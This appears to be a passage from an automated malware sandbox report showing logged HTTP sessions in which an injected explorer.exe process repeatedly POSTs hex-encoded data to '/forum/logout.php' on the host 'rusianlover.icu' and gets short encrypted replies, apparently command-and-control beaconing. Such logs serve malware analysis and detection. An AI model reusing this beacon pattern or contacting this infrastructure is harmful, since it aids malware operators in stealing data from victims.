                                        Data Raw: 73 6b 63 75 3d 61 66 39 61 30 30 39 64 31 31 32 38 31 65 65 61 39 30 32 32 39 33 64 36 39 31 26 71 67 77 6d 63 73 69 79 3d 39 38 31 31 38 34 30 36 26 75 6f 69 63 77 71 3d 34 62 65 36 34 38 66 30 36 62 33 64 31 62 36 37 30 30 35 39 38 32 39 66 63 37 32 38 64 66 35 63 65 65 63 33 31 63 31 37 35 64 65 61 63 33 31 32 37 66 39 38 65 39 63 62 30 61 36 30 65 32 36 66 36 63 36 63 31 38 38 34 33 39 35 39 31 32 61 64 38 64 62 32 36 65 62 64 39 31 39 36 30 32 33 64 39 35 62 35 39 64 61 38 62 65 62 38 35 35 62 62 62 30 63 37 30 32 33 32 34 66 37 63 66 65 66 62 66 36 36 65 31 34 65 35 32 62 34 34 37 66 65 36 34 64 62 32 63 64 34 30 36 34 64 34 31 65 39 61 31 61 38 37 39 30 30 66 64 62 62 64 38 33 36 32 61 62 36 62 33 64 39 65 39 65 30 32 36 63 34 30 32 37 37 30 64 61 64 62 65 32 30 35 63 38 61 66 61 65 38 64 36 61 38 31 34 63 66 30 64 37 37 32 34 34 61 36 30 62 34 35 63 32 37 62 62 61 62 65 61 32 62 36 62 33 65 38 61 36 30 64 66 37 33 33 39 65 62 32 66 62 30 37 31 36 32 34 64 65 38 61 33 61 33 34 38 33 64 64 64 34 32 38 30 64 33 33 65 32 31 36 63 33 30 62 39 34 35 61 36 30 32 64 65 65 64 36 65 66 30 62 32 65 36 38 61 31 31 30 38 33 34 30 35 63 64 30 36 30 65 66 62 31 64 64 61 33 30 30 64 38 66 65 36 36 64 62 63 31 35 32 64 34 38 35 63 30 62 30 37 66 64 32 64 34 36 64 63 30 65 33 66 30 36 32 37 39 39 39 39 31 64 33 33 38 30 62 63 32 37 65 32 35 33 65 34 35 31 31 35 31 32 31 64 38 37 32 37 61 31 31 61 30 31 33 66 39 32 66 33 36 65 30 66 35 38 33 65 65 64 64 36 37 33 62 33 61 36 66 32 37 62 36 32 39 31 32 35 34 38 33 35 36 61 32 61 39 30 36 64 38 31 35 66 39 62 33 33 34 62 66 31 65 38 33 31 61 62 37 64 35 30 35 32 62 32 65 35 61 63 36 61 33 37 30 34 39 31 66 64 62 30 38 37 61 35 61 39 38 32 32 30 63 61 63 39 63 64 62 36 63 38 39 65 35 32 32 30 63 32 61 37 33 61 33 30 30 66 34 39 36 31 33 37 39 39 62 33 61 63 62 38 36 34 66 31 35 38 33 65 64 65 65 65 36 32 38 66 61 37 65 64 30 65 66 39 61 32 35 30 32 34 66
                                        Data Ascii: skcu=af9a009d11281eea902293d691&qgwmcsiy=98118406&uoicwq=
                                        Mar 10, 2021 11:43:26.088395119 CET  10141               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a cd 16 a1 1f 31 bf 87 23 f5 d3 d2 27 dc 9f a5 c1 44 77 69 21 fc 32 4f bc b3 cb 1b aa 65 15 e3 a0 aa 36 ec 55 be 6e 6c e1 b0 48 3d 65 49 a4 8a ff ba 55 21 9e 1e 33 23 ba 23 cc fd b9 1c 34 e5 76 4f 5b 59 67 20 03 ab ae de 22 0c c2 39 a4 da b4 96 ee 89 d5 33 86 8e c9 50 18 fb 8f 3b 15 2f 71 a8 b5 f6 3e 1a 17 d4 70 2c 59 dc 9e 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d1#'Dwi!2Oe6UnlH=eIU!3##4vO[Yg "93P;/q>p,Y0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        22          192.168.2.5  49752        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:28.839087963 CET  10143               OUT        POST /forum/logout.php?id=8085154 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 671
                                        Cache-Control: no-cache
                                        Data Raw: 65 6f 73 63 67 71 3d 39 32 37 39 39 32 35 34 26 67 73 79 6b 71 63 69 75 3d 32 39 41 35 41 46 39 32 33 45 43 33 36 36 33 44 46 39 46 34 46 31 36 36 33 33 39 30 38 31 39 46 31 39 41 43 46 37 32 39 44 46 31 33 32 42 42 31 30 41 44 30 34 42 32 38 26 69 77 65 73 3d 64 35 34 66 33 32 31 62 36 31 61 35 30 30 64 61 32 34 30 31 65 38 30 34 61 36 38 31 36 61 38 36 37 61 62 39 62 37 63 37 65 37 64 36 62 33 65 34 64 66 30 31 30 37 32 64 38 39 64 31 62 39 37 63 65 31 61 62 61 32 64 36 36 33 30 64 33 38 32 62 35 66 30 38 38 64 34 38 33 66 62 64 34 34 34 61 38 65 34 34 30 65 61 64 63 34 38 33 65 32 62 36 61 31 64 36 31 36 34 65 39 34 39 39 64 61 34 61 33 65 33 63 30 39 38 34 64 32 65 64 62 63 66 62 33 35 62 66 35 38 39 30 61 39 33 65 30 32 38 61 39 33 30 62 61 33 36 39 35 30 32 35 32 33 62 37 65 36 35 62 66 65 32 38 63 33 66 35 63 36 30 63 32 63 64 31 31 30 65 66 34 39 34 61 33 37 64 65 39 31 61 33 36 64 64 31 65 63 36 62 66 61 32 63 32 34 35 65 63 64 65 37 63 30 65 38 61 32 61 35 30 30 33 62 36 32 34 36 37 63 35 66 65 63 30 36 32 62 63 62 31 63 37 38 61 65 38 66 64 32 38 34 66 61 66 39 32 39 32 66 30 31 64 62 31 65 65 38 30 64 62 36 61 38 37 35 38 65 65 61 33 64 34 38 34 38 39 63 36 34 39 35 66 62 37 39 31 30 64 66 61 33 39 39 61 63 32 32 61 39 39 63 39 39 37 62 33 35 36 33 38 34 64 63 31 35 39 30 37 34 31 64 35 62 66 38 38 65 62 31 63 31 62 65 65 35 32 32 65 65 62 35 30 36 34 31 39 63 66 38 37 30 35 31 35 33 62 37 65 31 64 64 63 38 36 36 35 36 66 32 35 34 61 36 31 64 64 64 38 35 65 33 38 38 39 61 35 39 37 66 33 63 31 63 34 62 31 35 64 37 33 37 38 39 39 31 39 65 38 62 62 38 37 65 31 37 36 36 35 35 37 39 65 33 61 36 35 35 37 64 61 65 30 61 37 36 37 34 33 34 39 36 64 33 64 63 31 61 61 34 65 30 36 38 62 36 34 39 63 32 64 65 62 30 61 30 37 66 34 62 63 39 36 36 65 36 35 32 32 65 61 32 38 35 30 32 33 36 38 38 34 30 65 35 31 62 34 34 34 33 66 65 32 65 38 35 63 32 65 31 32 37 34 62 64 39 39 36 64 31 64 34 66 38 30 65 61 33 30 65 30 32 30 64 39 65 62 35 32 38 39 33 31 34 30 30 62 62 35 66 39 36 66 31
                                        Data Ascii: eoscgq=92799254&gsykqciu=29A5AF923EC3663DF9F4F1663390819F19ACF729DF132BB10AD04B28&iwes=d54f321b61a500da2401e804a6816a867ab9b7c7e7d6b3e4df01072d89d1b97ce1aba2d6630d382b5f088d483fbd444a8e440eadc483e2b6a1d6164e9499da4a3e3c0984d2edbcfb35bf5890a93e028a930ba369502523b7e65bfe28c3f5c60c2cd110ef494a37de91a36dd1ec6bfa2c245ecde7c0e8a2a5003b62467c5fec062bcb1c78ae8fd284faf9292f01db1ee80db6a8758eea3d48489c6495fb7910dfa399ac22a99c997b356384dc1590741d5bf88eb1c1bee522eeb506419cf8705153b7e1ddc86656f254a61ddd85e3889a597f3c1c4b15d73789919e8bb87e17665579e3a6557dae0a76743496d3dc1aa4e068b649c2deb0a07f4bc966e6522ea28502368840e51b4443fe2e85c2e1274bd996d1d4f80ea30e020d9eb528931400bb5f96f1
                                        Mar 10, 2021 11:43:28.909027100 CET  10143               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 5b 29 cc 38 24 a5 ca 5a 73 5a 5c f8 ed 64 01 61 7e 35 a7 18 aa b4 a2 77 58 38 f5 1b 94 a9 21 e5 98 5a 9c ec 36 45 61 56 cb 57 42 06 b9 a1 af ac 3f 58 6d b4 f8 7c 5a e9 5d 65 3a 17 ac aa fe d5 c8 fd c3 d7 ee d1 52 74 ee af a2 d4 62 20 e4 3b b4 3e c8 f0 65 37 1d 04 f9 f9 cd 1b 22 c3 e1 88 35 fc b3 66 7a 38 3d 2a 57 53 53 c5 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d[)8$ZsZ\da~5wX8!Z6EaVWB?Xm|Z]e:Rtb ;>e7"5fz8=*WSS0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        23          192.168.2.5  49755        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:31.647181034 CET  10161               OUT        POST /forum/logout.php?id=5263631 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 669
                                        Cache-Control: no-cache
                                        Data Raw: 6d 79 71 63 3d 30 65 61 31 64 65 61 62 37 63 65 34 62 66 32 39 31 35 31 65 33 63 35 37 64 33 34 61 34 66 65 66 33 30 39 31 34 34 35 38 30 62 30 64 35 64 63 31 38 62 37 34 61 31 26 6b 75 6b 75 6b 75 6b 75 3d 38 30 34 34 34 39 37 34 26 6f 63 77 6b 65 73 3d 42 33 46 38 39 35 35 39 32 41 44 34 30 31 43 31 41 44 38 38 45 45 34 42 45 36 30 46 31 30 30 46 45 43 35 46 36 30 34 30 38 41 31 31 36 44 45 33 45 32 31 44 46 37 36 39 45 34 43 37 41 36 33 43 41 36 44 38 39 44 39 35 30 42 32 33 30 39 37 41 45 44 36 34 38 34 42 34 39 38 43 45 45 46 45 31 36 35 34 37 32 37 39 30 36 42 43 34 37 31 31 32 44 37 46 43 35 46 31 30 45 33 45 37 41 45 45 39 32 34 33 42 33 42 35 43 34 42 41 45 39 39 39 37 34 41 44 43 31 31 36 34 33 32 30 42 43 39 41 35 38 45 31 44 45 37 37 38 39 41 36 36 46 46 32 32 45 32 31 31 31 45 31 39 39 46 42 32 42 33 41 30 30 36 39 32 31 35 43 43 31 43 34 33 43 31 30 46 32 32 46 43 43 37 32 36 43 33 39 30 43 33 44 36 35 41 46 36 46 37 32 46 44 33 42 31 35 37 33 42 39 35 34 39 30 44 30 37 43 37 30 35 44 46 45 38 42 30 38 44 45 46 46 32 44 31 43 39 31 39 45 42 31 44 33 44 34 34 43 46 38 38 31 31 45 31 42 31 39 32 32 33 35 43 41 45 37 38 37 35 44 46 33 42 41 34 35 34 30 35 43 43 46 46 39 33 32 33 38 44 30 38 37 36 36 30 41 37 46 44 34 30 45 38 44 43 36 41 33 31 44 33 39 31 32 43 44 42 46 37 32 38 46 45 30 45 44 43 37 38 37 46 41 34 39 33 46 38 38 31 46 34 39 39 33 41 31 46 31 44 35 34 44 42 36 35 33 36 36 46 43 44 36 32 42 33 38 34 35 32 32 39 36 36 45 34 30 33 37 31 44 43 42 31 44 34 35 35 42 37 33 46 46 34 36 39 36 43 35 36 39 37 45 46 32 39 36 34 44 44 33 42 36 43 36 32 45 30 39 41 36 31 42 37 34 31 33 30 44 43 30 41 35 45 45 44 38 45 41 34 33 33 33 33 38 39 33 37 34 37 32 34 44 44 32 32 34 33 31 36 30 39 42 41 44 39 34 42 30 30 46 44 41 33 33 38 36 36 41 35 45 46 41 35 43 39 45 38 35 33 35 44 34 34 32 31 35 33 42 42 36 31 46 36 34 31 46 36 44 46 32 44 38 31 38 42 44 31 31 41 33 44 43 43 45 31 41 34 34 42 32 39 39 37 35 30 41 45 45 36 39 46 41 36 41 39 31 34 32 30 39 39 32 41
                                        Data Ascii: myqc=0ea1deab7ce4bf29151e3c57d34a4fef309144580b0d5dc18b74a1&kukukuku=80444974&ocwkes=B3F895592AD401C1AD88EE4BE60F100FEC5F60408A116DE3E21DF769E4C7A63CA6D89D950B23097AED6484B498CEEFE1654727906BC47112D7FC5F10E3E7AEE9243B3B5C4BAE99974ADC1164320BC9A58E1DE7789A66FF22E2111E199FB2B3A0069215CC1C43C10F22FCC726C390C3D65AF6F72FD3B1573B95490D07C705DFE8B08DEFF2D1C919EB1D3D44CF8811E1B192235CAE7875DF3BA45405CCFF93238D087660A7FD40E8DC6A31D3912CDBF728FE0EDC787FA493F881F4993A1F1D54DB65366FCD62B384522966E40371DCB1D455B73FF4696C5697EF2964DD3B6C62E09A61B74130DC0A5EED8EA4333389374724DD22431609BAD94B00FDA33866A5EFA5C9E8535D442153BB61F641F6DF2D818BD11A3DCCE1A44B299750AEE69FA6A91420992A
                                        Mar 10, 2021 11:43:31.722055912 CET  10162               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a a6 da 57 4f dc 70 ad 74 e9 2e 39 e0 46 b6 6b d0 98 98 26 9c 2f a2 db 4a ec dc 14 e4 4b 6c be ad d4 dd d9 e7 c3 3d 5a b6 83 5f c7 c6 4c 57 57 2d 31 70 99 84 af d3 5c b9 f0 9d 5c 98 5c b1 07 13 86 7b 73 e8 47 66 4d 07 63 40 de 62 43 87 cb 26 66 a7 58 6d 95 f2 c8 9a ff 42 a2 1d 9b f1 c0 76 ba 98 ed 44 d9 19 4a f2 17 b6 7a 6c 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dWOpt.9Fk&/JKl=Z_LWW-1p\\\{sGfMc@bC&fXmBvDJzl0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        24          192.168.2.5  49756        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:34.476636887 CET  10164               OUT        POST /forum/logout.php?pid=438 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 665
                                        Cache-Control: no-cache
                                        Data Raw: 6b 75 65 6f 79 69 73 63 3d 45 38 31 41 32 38 46 39 43 45 31 38 46 34 31 32 37 42 39 43 39 41 45 34 39 42 36 44 32 37 35 45 33 35 35 36 41 39 32 45 35 41 38 35 43 42 41 42 43 33 26 69 71 79 67 6f 77 3d 37 36 37 38 32 32 34 32 26 6d 79 6b 77 3d 32 34 35 44 30 46 45 38 31 36 34 35 46 44 46 44 39 44 46 44 30 33 46 33 34 44 43 44 41 37 41 43 38 46 46 30 33 30 33 37 46 37 32 41 37 45 31 33 41 41 35 35 35 37 45 35 33 31 35 30 33 30 34 46 45 32 30 42 43 34 37 31 31 31 43 32 30 33 37 36 30 37 41 44 32 38 37 46 33 41 33 41 39 39 42 44 43 33 39 33 30 37 45 46 31 46 46 34 39 38 44 39 34 34 33 36 43 38 37 44 35 34 34 42 46 46 33 45 38 36 39 35 45 44 36 38 32 44 45 43 38 37 45 31 45 31 46 35 38 44 41 33 41 41 35 34 33 45 43 37 37 42 36 31 31 32 33 46 34 32 30 46 37 39 39 37 34 35 41 38 46 35 31 35 30 30 43 31 39 42 38 42 44 44 33 32 39 33 32 43 45 36 45 32 43 31 30 41 45 34 37 33 37 39 38 45 41 35 35 32 46 44 41 42 44 33 38 39 43 44 37 34 34 32 37 30 34 42 41 45 37 42 42 31 45 34 46 42 33 32 41 37 32 43 43 30 46 46 37 39 34 30 38 39 45 44 39 42 33 31 30 39 44 30 41 42 36 32 33 45 34 36 44 34 32 38 44 38 36 45 32 30 31 32 44 32 43 38 45 34 37 34 35 30 30 30 44 43 34 43 42 31 39 39 36 39 30 32 41 34 34 37 36 41 35 31 31 31 34 43 39 36 34 36 43 36 38 30 38 46 46 35 45 31 42 31 43 44 33 42 38 42 41 41 37 41 31 42 44 33 32 43 31 45 31 42 39 43 36 36 39 32 44 31 32 38 33 39 45 34 33 39 45 41 45 38 33 33 46 30 45 35 36 45 46 31 39 42 33 38 46 34 46 45 46 34 38 35 32 38 43 30 41 31 37 33 41 30 35 44 42 35 41 32 45 32 39 34 38 44 36 36 33 35 34 33 31 30 38 46 31 31 39 41 36 34 41 39 41 32 32 43 34 37 36 44 42 44 45 46 46 43 30 39 36 32 39 46 45 43 41 33 46 39 44 43 45 38 34 34 41 44 32 46 33 44 33 46 38 37 45 35 35 37 35 43 38 43 42 33 33 35 45 43 43 31 34 30 38 32 39 46 31 35 35 31 41 44 46 44 42 37 42 31 35 31 41 42 39 44 30 34 32 36 34 30 39 33 30 46 38 35 35 44 35 37 30 35 44 37 31 30 36 44 39 44 32 31 30 33 44 41 38 42 33 32 45 31 37 39 31 39 32 36 41 39 30 42 34 44 39 34 37 33
                                        Data Ascii: kueoyisc=E81A28F9CE18F4127B9C9AE49B6D275E3556A92E5A85CBABC3&iqygow=76782242&mykw=245D0FE81645FDFD9DFD03F34DCDA7AC8FF03037F72A7E13AA5557E53150304FE20BC47111C2037607AD287F3A3A99BDC39307EF1FF498D94436C87D544BFF3E8695ED682DEC87E1E1F58DA3AA543EC77B61123F420F799745A8F51500C19B8BDD32932CE6E2C10AE473798EA552FDABD389CD7442704BAE7BB1E4FB32A72CC0FF794089ED9B3109D0AB623E46D428D86E2012D2C8E4745000DC4CB1996902A4476A51114C9646C6808FF5E1B1CD3B8BAA7A1BD32C1E1B9C6692D12839E439EAE833F0E56EF19B38F4FEF48528C0A173A05DB5A2E2948D663543108F119A64A9A22C476DBDEFFC09629FECA3F9DCE844AD2F3D3F87E5575C8CB335ECC140829F1551ADFDB7B151AB9D042640930F855D5705D7106D9D2103DA8B32E1791926A90B4D9473
                                        Mar 10, 2021 11:43:34.552752972 CET  10165               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 15 2d 76 15 1c 3b 5c 57 30 d0 a9 31 40 ac d2 3c c3 93 cf b6 85 e0 50 86 69 4f 44 92 14 ef ed 44 8e da 36 b8 cb dc 50 7d 53 13 e6 a3 1e 8b 89 c1 20 c9 af 94 e8 8b b1 22 cf 2b 0a 66 4e d0 cc 41 d4 1f 4a a2 6e 4f 0f 65 be a6 ba 8f f4 92 f6 e3 eb 02 1a 7a 2f 9b cd 68 5d 69 46 47 31 86 44 8e 72 4b 07 7c 24 08 bf 24 3a 7c fb 5f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d-v;\W01@<PiODD6P}S "+fNAJnOez/h]iFG1DrK|$$:|_0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        25          192.168.2.5  49758        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:37.290297985 CET  10178               OUT        POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 667
                                        Cache-Control: no-cache
                                        Data Raw: 75 75 6f 6f 69 69 3d 35 38 44 34 43 39 33 36 39 34 32 38 37 46 34 30 46 32 46 30 46 37 44 46 35 39 41 43 30 41 33 41 41 41 41 46 36 45 38 41 35 33 44 45 37 32 34 41 41 31 42 37 26 73 71 69 67 3d 32 30 38 32 33 35 32 38 26 77 79 75 77 73 75 77 73 3d 36 61 61 37 37 33 64 37 39 62 38 66 61 31 64 34 62 38 64 66 31 35 63 34 63 31 38 63 32 66 30 38 63 36 31 65 36 38 32 39 66 37 33 35 62 63 65 63 34 39 38 34 32 63 36 36 35 66 37 35 36 65 64 31 32 64 32 31 38 35 65 61 65 31 64 32 36 62 66 34 34 62 39 32 61 32 32 38 63 33 37 34 31 65 66 39 36 32 31 66 37 65 63 66 65 61 34 31 64 35 35 32 39 32 32 31 63 37 37 32 37 34 61 61 30 31 34 39 38 36 65 39 39 30 61 36 36 30 39 32 61 32 36 34 31 61 65 65 62 65 39 38 31 39 37 34 39 35 38 31 38 32 30 33 36 33 66 30 66 39 38 37 66 36 62 61 64 38 66 39 37 36 38 39 39 61 36 38 62 35 63 30 34 34 31 39 31 61 36 36 31 35 63 34 62 36 35 39 63 37 33 61 36 39 66 33 35 34 38 36 38 30 30 35 62 37 36 31 38 39 31 39 38 66 64 61 34 33 32 34 36 63 62 63 63 65 39 39 39 37 62 34 38 32 66 64 35 37 37 30 34 31 31 66 38 64 62 33 61 34 33 63 61 66 38 37 66 32 63 30 63 32 31 64 33 66 61 66 66 38 65 65 32 31 62 62 65 33 62 38 39 34 32 36 64 37 31 61 64 30 62 31 35 63 32 61 39 37 31 33 37 39 35 63 38 37 31 34 65 39 34 63 33 36 32 39 38 64 66 36 66 66 33 64 34 35 64 32 34 32 35 35 38 31 39 34 35 61 30 38 33 66 37 62 38 36 34 37 39 65 65 30 33 31 38 61 35 66 30 63 38 30 39 61 30 36 62 38 31 63 66 37 65 32 63 66 37 62 61 38 39 39 64 64 65 63 31 35 34 61 38 37 33 62 66 62 64 62 63 39 64 37 66 63 36 36 63 31 34 32 36 63 64 33 39 33 31 36 62 34 39 38 39 37 33 64 32 34 37 33 32 35 63 31 33 36 65 39 31 36 39 38 31 63 39 31 63 39 30 33 65 37 61 39 62 64 30 36 31 32 62 33 36 30 36 35 36 32 31 65 65 33 36 31 39 39 65 33 34 39 65 61 61 34 35 31 65 37 63 39 66 39 65 34 62 62 39 35 38 62 30 39 36 30 61 36 61 61 35 32 39 32 36 30 63 32 31 64 65 64 66 32 66 61 61 35 31 39 38 39 64 35 30 65 38 65 37 35 66 33 38 36 63 36 62 30 39 65 30 65 38 31 36 32 38 61 37 32 33 33 64 64 30 65
                                        Data Ascii: uuooii=58D4C93694287F40F2F0F7DF59AC0A3AAAAF6E8A53DE724AA1B7&sqig=20823528&wyuwsuws=6aa773d79b8fa1d4b8df15c4c18c2f08c61e6829f735bcec49842c665f756ed12d2185eae1d26bf44b92a228c3741ef9621f7ecfea41d5529221c77274aa014986e990a66092a2641aeebe9819749581820363f0f987f6bad8f976899a68b5c044191a6615c4b659c73a69f354868005b76189198fda43246cbcce9997b482fd5770411f8db3a43caf87f2c0c21d3faff8ee21bbe3b89426d71ad0b15c2a9713795c8714e94c36298df6ff3d45d2425581945a083f7b86479ee0318a5f0c809a06b81cf7e2cf7ba899ddec154a873bfbdbc9d7fc66c1426cd39316b498973d247325c136e916981c91c903e7a9bd0612b36065621ee36199e349eaa451e7c9f9e4bb958b0960a6aa529260c21dedf2faa51989d50e8e75f386c6b09e0e81628a7233dd0e
                                        Mar 10, 2021 11:43:37.364464045 CET  10178               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a b9 79 de 49 86 05 1a 7e b7 6b 15 21 4d 21 e5 77 8b 1c cc 55 4e 8a ba 9f ed ff ec e4 87 c3 48 91 94 04 ac f6 b6 09 fe ac bc d6 49 9d 8f a6 e1 96 2b 0d 6e 70 02 5b d8 c1 2f 5c 0c 01 b7 f8 fe 34 3c 70 46 6e af e5 46 9b 3d e7 e4 64 94 6d 76 fc 77 56 f4 9d e7 19 61 61 08 98 67 18 af f0 a0 38 0b ad 60 b1 0f a7 24 08 43 2d 2c 06 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dyI~k!M!wUNHI+np[/\4<pFnF=dmvwVaag8`$C-,0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        26          192.168.2.5  49759        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:40.332887888 CET  10180               OUT        POST /forum/logout.php?pid=925 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 663
                                        Cache-Control: no-cache
                                        Data Raw: 61 67 6d 6d 73 79 79 65 3d 41 31 43 32 45 35 46 34 39 33 38 32 42 32 45 33 36 32 35 37 35 32 39 41 30 34 36 39 39 43 36 36 33 35 45 33 42 41 46 41 44 41 41 32 33 45 38 41 26 79 63 67 65 69 6d 3d 38 38 35 33 34 31 30 36 26 63 6b 73 75 3d 63 35 38 62 66 38 31 66 61 36 33 36 38 35 66 37 62 61 38 38 64 34 34 35 33 34 31 34 65 62 30 35 34 31 36 39 65 66 61 66 65 36 63 30 62 31 37 32 65 61 62 63 35 33 65 37 39 65 64 62 63 62 34 31 61 38 64 30 34 30 30 62 32 62 31 38 32 38 39 34 32 63 61 31 34 32 64 66 61 38 65 34 36 61 62 30 63 30 32 37 30 63 38 63 63 34 36 62 66 30 31 33 63 63 35 39 36 39 37 64 62 32 30 62 39 65 64 35 31 30 33 33 35 33 38 61 36 38 66 37 66 34 31 38 62 34 38 31 33 32 36 35 64 33 30 32 63 33 32 34 33 33 63 31 63 35 62 33 35 66 36 39 39 34 36 33 39 36 38 38 66 62 37 36 66 64 34 63 31 38 63 39 38 36 63 61 31 37 61 32 30 38 39 32 34 31 34 66 35 37 37 31 63 61 64 62 38 37 63 37 34 39 35 64 37 65 36 32 65 34 62 32 34 64 63 65 37 33 34 64 62 61 33 33 30 30 36 62 65 34 61 64 30 39 30 64 32 38 35 35 38 62 63 63 32 65 35 31 32 38 31 32 35 32 35 64 63 66 34 38 33 31 37 39 32 61 33 62 62 32 63 62 33 39 35 34 62 35 35 37 38 64 32 61 35 38 30 66 31 65 39 63 62 39 33 38 38 64 31 33 39 32 38 33 63 33 33 33 66 39 36 30 62 33 39 37 31 65 64 35 39 33 30 38 61 66 64 61 62 34 30 39 32 30 31 61 34 62 30 39 34 38 33 64 31 64 31 31 30 38 65 61 30 33 36 35 34 65 62 65 30 35 39 65 37 32 62 32 37 30 38 33 30 39 61 62 32 32 38 35 64 33 38 39 39 38 64 66 36 63 31 38 66 37 39 32 36 35 34 31 65 39 64 61 61 66 65 30 33 31 34 35 30 30 66 64 62 32 36 65 62 36 32 34 62 65 30 31 30 32 65 32 64 61 38 66 37 37 62 31 33 39 37 30 32 36 30 36 36 32 64 61 62 36 37 30 63 34 35 31 33 39 62 36 31 65 34 30 65 39 66 64 34 30 30 36 62 38 38 34 39 39 39 61 63 64 39 36 66 35 66 38 61 31 65 63 39 65 65 38 33 33 33 65 37 62 35 31 66 32 33 61 30 63 65 32 31 35 38 35 63 32 65 66 62 37 37 64 65 66 34 38 65 30 31 33 64 61 65 37 35 33 37 37 63 32 33 62 62 63 38 37 31 35 32 64 66 38 64 30 35 38 30 38
                                        Data Ascii: agmmsyye=A1C2E5F49382B2E36257529A04699C6635E3BAFADAA23E8A&ycgeim=88534106&cksu=
                                        Mar 10, 2021 11:43:40.402903080 CET  10180               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a b8 ba 73 46 52 80 79 06 99 cf be e1 2b b4 2e aa f5 24 75 80 ba 71 de 68 b1 45 51 1a 66 eb 6e b1 44 91 d7 42 00 84 2a f4 39 37 2f 19 79 56 5f 84 fe 78 35 1c 41 6d 73 87 0e bf 1c 45 b9 58 99 c3 ae f6 f6 88 d3 e4 8b df 7a 1c f4 0a 4e 81 09 cd 31 8e 8f 76 86 51 03 8d df 56 e2 e5 d8 23 f7 1d bd 1c 84 51 ba 4d 07 23 b5 27 0b ac 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dsFRy+.$uqhEQfnDB*97/yV_x5AmsEXzN1vQV#QM#'0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        27          192.168.2.5  49760        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:43.684663057 CET  10182               OUT        POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 648
                                        Cache-Control: no-cache
